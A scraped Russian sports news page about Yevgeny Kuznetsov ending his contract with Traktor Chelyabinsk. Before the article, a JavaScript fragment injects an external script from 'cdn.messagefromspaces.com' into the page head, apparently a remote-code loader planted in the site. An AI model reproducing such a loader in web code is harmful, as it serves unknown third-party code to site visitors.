, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

«Трактор» расторг контракт с Евгением Кузнецовым

Нападающий Евгений Кузнецов официально покидает челябинский "Трактор". Сегодня форвард и руководство клуба расторгли контракт по обоюдному согласию сторон. Соглашение Кузнецова действовало до 30 апреля текущего года.

Теперь талантливый форвард может подписать контракт с клубом НХЛ "Вашиннгтон", который в задрафтовал Кузнецова три года назад. Отметим, что в нашей стране все права на хоккеиста по-прежнему принадлежат "Трактору". Так что в случае локаута в НХЛ, Евгений сможет выступать за родной клуб.

Отметим, что Евгений Кузнецов уже попрощался с болельщиками в матче против "Ак Барса". В этом поединке нападающий вышел на лед с капитанской нашивкой. После матча преданные поклонники Кузнецова преподнесли ему прощальный подарок.

Кузнецов является воспитанником челябинского "Трактора". В составе черно-белых он провел 251 встречу, в которых набрал 167 очков. На счету Евгения 78 заброшенных шайб и 89 голевых передач.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
20:50 - 07 марта 2014
|
автор: U-RSS
|
(558)
|
(0)

Комментарии (0)

Я человек
Я бот